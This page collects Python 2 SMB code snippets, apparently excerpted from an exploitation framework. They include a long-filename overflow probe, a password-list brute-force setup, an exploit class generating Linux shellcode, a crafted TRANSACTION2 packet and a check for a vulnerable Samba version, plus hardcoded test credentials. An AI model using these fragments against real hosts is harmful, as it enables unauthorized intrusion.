Ejemplo n.º 1
0
    def run(self):
        self.getargs()
        self.setInfo('%s attacking %s:%d (in progress)' %
                     (NAME, self.host, self.port))
        s = self.getsocket()
        sockaddr = (self.host, self.port)
        connected = False
        try:
            s.connect(sockaddr)
            connected = True
        except:
            self.log('Could not connect to: %s:%d' % sockaddr)

        if not connected:
            self.setInfo('%s attacking %s:%d - done (failed)' %
                         (NAME, self.host, self.port))
            return 0

        my_smb = SMBClient(s, username=self.user, password=self.password)

        try:
            my_smb.negotiate()
            my_smb.session_setup()
            my_smb.tree_connect(self.share)
            attackstring = 'A' * 0x800
            my_smb.find_first(filename=attackstring, response=False)
        except SMBClientException, ex:
            self.log('SMB Error: %s' % ex)
            return 0
Ejemplo n.º 2
0
    def run(self):
        self.getArgs()
        self.log('%s running against %s:%s covertness: %d' %
                 (NAME, self.host, self.port, self.covertness))
        self.setInfo('%s attacking %s:%s (Covertness:%d) - running' %
                     (NAME, self.host, self.port, self.covertness))

        self.log('Share is: %s' % self.share)

        try:
            passwords = file(self.filename).readlines()
        except:
            self.log('Failed to open password file %s' % (self.filename))
            return 0

        passwords.insert(0, self.username)
        passwords.insert(0, u'')
        sockaddr = (self.host, self.port)

        try:
            s = self.getsocket()
            s.connect(sockaddr)
            smbobj = SMBClient(s, username=self.username)
            smbobj.negotiate()
        except SMBClientException, ex:
            self.log('Failed to negotiate: %s' % ex)
            return 0
Ejemplo n.º 3
0
    def test(self):
        """
        Connect to the target and spawn a vfs-shell if we get a connection
        """
        self.getargs()
        self.setInfo("%s attacking %s:%d (Covertness:%d) - running" %\
                    (NAME, self.host, self.port, self.covertness))

        s = self.getsocket()
        sockaddr = (self.host, self.port)

        try:
            s.connect(sockaddr)
        except:
            self.log('Could not connect to %s:%d' % sockaddr)
            return 0

        self.log_info(u"Using domain=%s user=%s, password %s" % (self.domain, self.user, self.password))
        smbobj = SMBClient(s, username=self.user, password=self.password, domain=self.domain)
        smbobj.is_unicode = True

        try:
            smbobj.negotiate()
            smbobj.session_setup()
            self.log_info("Trying treeconnect_AndX on share %s" % self.filename)
            smbobj.tree_connect(self.filename)
            self.log_info("Connected to share %s" % self.filename)
        except SMBClientException, ex:
            self.log_error('Error during SMB operations: %s' % ex)
            return 0
Ejemplo n.º 4
0
class DCERPCOverSMB(DCERPCConnection):
    def __init__(self, s, address, port, named_pipe, username=None, password=None, domain=None, kerberos_db=None, use_krb5=False, frag_level=None):
        DCERPCConnection.__init__(self, s, address, port, username, password, domain)
        self.named_pipe = named_pipe
        self.smb = None
        self.frag_level = frag_level
        self.kerberos_db = kerberos_db
        self.use_krb5 = use_krb5

    def connect(self):
        # Return 0 for success, 1 for error
        sockaddr = (self.address, self.port)
        try:
            self.s.connect(sockaddr)
            if self.smb == None:
                self.smb = SMBClient(self.s, username=self.username, password=self.password, domain=self.domain, frag_level=self.frag_level)
            self.smb.is_unicode = True
            self.smb.negotiate()
            self.smb.session_setup(kerberos_db=self.kerberos_db, use_krb5=self.use_krb5)
            self.smb.tree_connect(u'IPC$')
            self.smb.nt_create(name=self.named_pipe, desired_access=SYNCHRONIZE|FILE_READ_DATA|FILE_WRITE_DATA|FILE_APPEND_DATA|FILE_READ_EA|FILE_WRITE_EA|FILE_READ_ATTRIBUTES|FILE_WRITE_ATTRIBUTES|READ_CONTROL,
                               share_access = FILE_SHARE_READ|FILE_SHARE_WRITE)
        except Exception, ex:
            logging.debug('Error during SMB operations: %s' % ex)
            return 1
        return 0
Ejemplo n.º 5
0
    def run(self):
        """
        Connect to the target and spawn a vfs-shell if we get a connection
        """
        self.result = []
        self.getargs()

        self.log_info("%s running against %s:%d covertness: %d" %\
                (NAME, self.host, self.port, self.covertness))
        self.setInfo("%s attacking %s:%d (Covertness:%d) - running" %\
                (NAME, self.host, self.port, self.covertness))
        self.log_info(u"Using domain=%s user=%s, password %s" %\
                (self.domain, self.user, self.password))

        # Sanity check: the ccache credentials
        if self.ccache_file:
            if not self.check_ccache_file():
                self.log_error('%s doesn\'t seem to be a valid ccache file for user %s' % (self.ccache_file, '@'.join([self.user,self.domain])))
                return 0
            else:
                self.use_kerberos = True
                self.log_info("Using kerberos authentication with credentials %s" % self.ccache_file)
        else:
            self.log_info("Using NTLM authentication")

        connected = False

        for p in set([self.port, 445]):
            s = self.getsocket()
            sockaddr = (self.host, p)
            try:
                s.connect(sockaddr)
                connected = True
                self.port = p
                break
            except:
                self.log_error("Could not connect to %s:%d" % sockaddr)

        if not connected:
            return 0

        retry = False

        if self.use_kerberos:
            smbobj = SMBClient(s, self.user, self.password, self.domain, kerberos_db=self.ccache_file, use_krb5=True)
        else:
            smbobj = SMBClient(s, self.user, self.password, self.domain)

        try:
            smbobj.negotiate()
            smbobj.session_setup()
        except SMBClientException, ex:
            self.log_error('Error during SMB session setup: %s' % ex)
            retry = True
Ejemplo n.º 6
0
    def test(self):
        self.getArgs()
        self.log('%s running against %s:%s covertness: %d' %
                 (NAME, self.host, self.port, self.covertness))
        self.setInfo('%s attacking %s:%s (Covertness:%d) - running' %
                     (NAME, self.host, self.port, self.covertness))

        sockaddr = (self.host, self.port)
        s = self.getsocket()

        try:
            s.connect(sockaddr)
        except:
            self.log('Could not connect to remote host')
            return 0

        try:
            smbobj = SMBClient(s, username=self.username)
            smbobj.negotiate()
        except SMBClientException, ex:
            self.log('Could not negotiate with SMB server: %s' % ex)
            return 0
Ejemplo n.º 7
0
    def do_detect(self, unicode=True):
        try:
            s = self.gettcpsock()
            s.connect((self.host, self.port))
            smbobj = SMBClient(s,
                               username=self.username,
                               password=self.password)
            smbobj.is_unicode = unicode
            smbobj.extended_security = True
            smbobj.negotiate()
            smbobj.session_setup()

            return smbobj.nativeos, smbobj.nativelanman
        finally:
            s.close()
Ejemplo n.º 8
0
    def connect(self):
        # Return 0 for success, 1 for error
        sockaddr = (self.address, self.port)
        try:
            self.s.connect(sockaddr)
            preexisting_smb = False
            if self.smb:
                preexisting_smb = True

            if self.smb == None:
                self.smb = SMBClient(self.s,
                                     username=self.username,
                                     password=self.password,
                                     domain=self.domain,
                                     frag_level=self.frag_level)

            self.smb.is_unicode = True

            # This has to be done only for new connections
            # If we are reusing an existing SMB connection there is no need to
            # re-negotiate and setup_session
            if preexisting_smb == False:
                self.smb.negotiate()
                self.smb.session_setup(kerberos_db=self.kerberos_db,
                                       use_krb5=self.use_krb5)

            self.smb.tree_connect(u'IPC$')
            self.smb.nt_create(
                name=self.named_pipe,
                desired_access=SYNCHRONIZE | FILE_READ_DATA | FILE_WRITE_DATA
                | FILE_APPEND_DATA | FILE_READ_EA | FILE_WRITE_EA
                | FILE_READ_ATTRIBUTES | FILE_WRITE_ATTRIBUTES | READ_CONTROL,
                share_access=FILE_SHARE_READ | FILE_SHARE_WRITE)
            return 0
        except Exception as e:
            logging.error('DCERPCOverSMB.connect() failed: %s' % str(e))
            return 1
Ejemplo n.º 9
0
    def test(self):
        """ use share enum to find Asus Eee PC string """
        self.host = self.target.interface
        self.port = int(self.argsDict.get("port", self.port))

        ret = self.exploitnodes("shareenum")
        if ret in [None, []]:
            self.log("[-] No shares found")
        else:
            for share in ret[0]:
                self.log("[+] Share comment: %s" % share.comment)
                if "ASUS EEE PC" in share.comment.upper().replace('\x00', ''):
                    self.log(
                        "[!] Found ASUS Eee PC .. trying to determine SAMBA version :>"
                    )
                    if ':' in self.host:
                        s = self.gettcpsock(AF_INET6=1)
                    else:
                        s = self.gettcpsock()

                    try:
                        smb = SMBClient(s)
                        smb.negotiate()
                        smb.session_setup()
                    except SMBClientException, ex:
                        self.log('[-] Could not SMB connect: %s' % ex)
                        return 0

                    self.log(u"[+] OS: %s LANMAN: %s" %
                             (smb.nativeos, smb.nativelanman))

                    # we can be pedantic if we want .. by why is this not smb.server ???
                    if u"Samba 3.0.24" in smb.nativelanman:
                        self.log("[!] Found vulnerable SAMBA version :D")

                    self.version = 1
                    return 1
Ejemplo n.º 10
0
    def do_smb(self):
        """ do windows SMB detection """
        result = None
        self.log("SMB DETECT: Doing SMB OS Detection")
        smbobj = None
        port = 445
        nativeos = u''
        lanman = u''
        domain = u''
        server = u''

        def get_socket():
            if ':' in self.host:
                return self.gettcpsock(AF_INET6=1)
            else:
                return self.gettcpsock()

        try:
            sockaddr = (self.host, port)
            s = get_socket()
            s.connect(sockaddr)

            # First do the negotiation without extended security (get domainname/servername)
            smbobj = SMBClient(s, username=self.user, password=self.password)
            smbobj.is_unicode = True
            smbobj.extended_security = False
            smbobj.negotiate()
            s.close()
            domain = unicode(smbobj.primarydomain)
            server = unicode(smbobj.servername)

            # Now we do a complete session setup exchange
            s = get_socket()
            s.connect(sockaddr)
            smbobj = SMBClient(s, username=self.user, password=self.password)
            smbobj.is_unicode = True
            smbobj.extended_security = True
            smbobj.negotiate()
            smbobj.session_setup()
            s.close()
            nativeos = unicode(smbobj.nativeos)
            lanman = unicode(smbobj.nativelanman)

        except SMBException, ex:
            self.log('SMB error: %s' % ex)
            return None
Ejemplo n.º 11
0
class theexploit(tcpexploit):
    def __init__(self):
        tcpexploit.__init__(self)

        self.setVersions()
        self.domain = ''
        self.host = ""
        self.port = 445
        self.version = 0
        self.user = u''
        self.name = NAME
        self.ccache_file = None
        self.use_kerberos = False
        self.badstring = "\x00\\/.:?\r\n%?"

    def getargs(self):
        self.host = self.target.interface
        self.user = self.argsDict.get("user", self.user)
        self.port = self.argsDict.get("port", self.port)
        self.password = self.argsDict.get("password", self.password)
        self.domain = self.argsDict.get("domain", self.domain)
        self.ccache_file = self.argsDict.get('krb5_ccache', self.ccache_file)
        self.socknode = self.argsDict["passednodes"][0]

    def createShellcode(self):
        self.createLinuxGOShellcode(self.badstring)

    def getsocket(self):
        if ':' in self.host:
            return self.gettcpsock(AF_INET6=1)
        else:
            return self.gettcpsock()

    def check_ccache_file(self):
        try:
            # Can we open the credential file?
            cc1 = cc.CCache()
            cc1.open(self.ccache_file, new=0)
            # Is the DB related to the username?
            principal = cc1.get_primary_principal()
            user_domain = '@'.join([self.user, self.domain]).lower()
            if user_domain != principal.lower():
                return False

            # Do we have credential information that is not only configuration?
            creds = cc1.get_credentials()
            found_valid_creds = 0
            for cred in creds:
                if not cred.is_config_credential():
                    found_valid_creds = 1
            if not found_valid_creds:
                return False
            else:
                return True
        except Exception as e:
            return False
        else:
            return True

    def getsmbobj(self, sharename):
        s = self.getsocket()
        sockaddr = (self.host, self.port)
        try:
            s.connect(sockaddr)
        except Exception, ex:
            logging.error('Error during connect to %s:%d %r' %
                          (sockaddr[0], sockaddr[1], ex))
            return None

        if self.use_kerberos:
            smbobj = SMBClient(s,
                               self.user,
                               self.password,
                               self.domain,
                               kerberos_db=self.ccache_file,
                               use_krb5=True)
        else:
            smbobj = SMBClient(s, self.user, self.password, self.domain)

        try:
            smbobj.negotiate()
            smbobj.session_setup()
        except SMBClientException, ex:
            logging.error('Error during SMB session setup: %s' % ex)
            return None
Ejemplo n.º 12
0
class DCERPCOverSMB(DCERPCConnection):
    def __init__(self,
                 s,
                 address,
                 port,
                 named_pipe,
                 username=None,
                 password=None,
                 domain=None,
                 kerberos_db=None,
                 use_krb5=False,
                 frag_level=None,
                 smb_client=None):
        DCERPCConnection.__init__(self, s, address, port, username, password,
                                  domain)
        self.named_pipe = named_pipe
        self.smb = None
        self.frag_level = frag_level
        self.kerberos_db = kerberos_db
        self.use_krb5 = use_krb5
        if smb_client:
            self.smb = smb_client

    def connect(self):
        # Return 0 for success, 1 for error
        sockaddr = (self.address, self.port)
        try:
            self.s.connect(sockaddr)
            preexisting_smb = False
            if self.smb:
                preexisting_smb = True

            if self.smb == None:
                self.smb = SMBClient(self.s,
                                     username=self.username,
                                     password=self.password,
                                     domain=self.domain,
                                     frag_level=self.frag_level)

            self.smb.is_unicode = True

            # This has to be done only for new connections
            # If we are reusing an existing SMB connection there is no need to
            # re-negotiate and setup_session
            if preexisting_smb == False:
                self.smb.negotiate()
                self.smb.session_setup(kerberos_db=self.kerberos_db,
                                       use_krb5=self.use_krb5)

            self.smb.tree_connect(u'IPC$')
            self.smb.nt_create(
                name=self.named_pipe,
                desired_access=SYNCHRONIZE | FILE_READ_DATA | FILE_WRITE_DATA
                | FILE_APPEND_DATA | FILE_READ_EA | FILE_WRITE_EA
                | FILE_READ_ATTRIBUTES | FILE_WRITE_ATTRIBUTES | READ_CONTROL,
                share_access=FILE_SHARE_READ | FILE_SHARE_WRITE)
            return 0
        except Exception as e:
            logging.error('DCERPCOverSMB.connect() failed: %s' % str(e))
            return 1

    def recv(self, filesize=65535, option=0):
        data = StringIO()
        if filesize == 65535:
            try:
                to_read, _, _ = self.smb.transact_peek_np()
                filesize = to_read
                logging.debug('recv: %d' % filesize)
            except SMBTransactException as e:
                logging.debug('smb.transact_peek_np() failed: %s' % e)
                # transact_peek_np may not be supported (i.e. samba)
                # in that case we fall back to doing a big read
                pass

        if filesize == 0:
            logging.debug('Returning from recv(), no data in pipe.')
            return None

        try:
            self.smb.read(data, filesize=filesize)
        except Exception as e:
            logging.debug('smb.read() failed: %s' % str(e))
            return None

        return data.getvalue()

    def send_recv(self, data, response=True, option=0):
        try:
            if (option & OPTION_SMB_TRANSACT) == 0:
                send_data = StringIO(data)
                self.smb.write(send_data)
                if response == True:
                    ret = self.recv(option=option)
                    return ret
                else:
                    return None
            else:
                data = self.smb.transact_np(data, response=response)
                return data
        except Exception as e:
            logging.debug('DCERPCOverSMB.send_recv() failed: %s' % str(e))
            return None

    def disconnect(self):
        try:
            self.smb.tree_disconnect()
            self.smb.logoff()
            self.s.close()
        except SMBException, ex:
            logging.debug('DCERPCOverSMB.disconnect() failed: %s' % str(e))
Ejemplo n.º 13
0
    sys.path.append('.')

from libs.newsmb.smbconst import *
from libs.newsmb.libsmb import SMBClient

NT_TRANSACT_IOCTL = 0x0002

if __name__ == '__main__':
    from socket import socket
    #import cStringIO
    sockaddr = ('192.168.2.107', 445)
    s = socket()
    s.connect(sockaddr)
    u = u'kostya'
    p = u'basrules'
    smb = SMBClient(s, u, p)
    smb.is_unicode = True
    smb.negotiate()
    smb.session_setup()
    if False:
        smb.tree_connect(u'Empty')
        smb.nt_create(name=u'sourcefile.bin\0',
                      desired_access=0x20089,
                      share_access=0x5,
                      disposition=0x1,
                      options=0x200044)
        source_fid = smb.fid
        smb.nt_create(name=u'destinationfile.bin\0',
                      desired_access=0x30197,
                      share_access=0x0,
                      disposition=0x5,
Ejemplo n.º 14
0
        if retry:
            if self.port != 445:
                self.log_info('Retrying with port 445')
                self.port = 445
                try:
                    s = self.getsocket()
                    sockaddr = (self.host, self.port)
                    s.connect(sockaddr)
                except:
                    return 0

                if self.use_kerberos:
                    smbobj = SMBClient(s, username=self.user,
                                       password=self.password,
                                       domain=self.domain,
                                       kerberos_db=self.ccache_file,
                                       use_krb5=True)
                else:
                    smbobj = SMBClient(s, username=self.user,
                                       password=self.password,
                                       domain=self.domain)

                try:
                    smbobj.negotiate()
                    smbobj.session_setup()
                    smbobj.tree_connect(self.filename)
                except SMBClientException, ex:
                    self.log_error(u'Failed to connect to share: %s' % ex)
                    return 0
            else:
Ejemplo n.º 15
0
    def run(self):
        self.getargs()
        self.setInfo('%s attacking %s:%d (in progress)' %
                     (NAME, self.host, self.port))
        s = self.getsocket()
        sockaddr = (self.host, self.port)

        try:
            s.connect(sockaddr)
        except:
            self.log('Could not connect to: %s:%d' % sockaddr)
            return 0

        try:
            my_smb = SMBClient(s, username=self.user, password=self.password)
            my_smb.negotiate()
            my_smb.session_setup()
            my_smb.tree_connect(u'IPC$')
            my_smb.packet = SMBPacket(None,
                                      SMB_COM_TRANSACTION2,
                                      tid=my_smb.tid,
                                      pid=my_smb.pid,
                                      mid=my_smb.mid,
                                      uid=my_smb.uid,
                                      is_unicode=my_smb.is_unicode)
            params = ''
            params += struct.pack('<HHHLLHLLL', 0, 0, 0, 0, 0, 0, 0, 0, 0)
            params += '\\browser'
            params += '\0' * (4 - len(params) % 4)
            my_smb.packet.body['Parameters'] = params
            my_smb.packet.body['MaxParameterCount'] = 4
            my_smb.packet.body['MaxDataCount'] = 0
            my_smb.packet.body['Setup'] = '\x00\x00'
            my_smb.packet.body['Pad'] = '\x00\x00'
            my_smb.send()
        except SMBClientException, ex:
            self.log('SMB Error: %s' % ex)
            return 0